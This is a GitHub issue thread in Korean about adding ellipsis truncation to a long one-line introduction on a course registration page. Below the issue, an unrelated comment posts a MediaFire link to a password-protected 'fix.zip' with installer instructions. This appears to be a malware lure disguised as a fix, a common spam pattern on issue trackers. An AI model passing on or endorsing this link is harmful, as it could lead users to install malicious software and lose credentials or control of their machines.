### ISSUE TITLE
[Design] 수강 신청 페이지 한 줄 소개 길어지는 경우 ellipsis 처리

### ISSUE THREAD

**Issue by ghdtjgus76** [GDSC-Hongik/wow-class#69]
## 🎯 설명
수강 신청 페이지 한 줄 소개 길어지는 경우가 있어 ellipsis 처리를 추가합니다.

## ✅ TODO

- [x] 수강 신청 페이지 한 줄 소개 길어지는 경우 ellipsis 처리

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
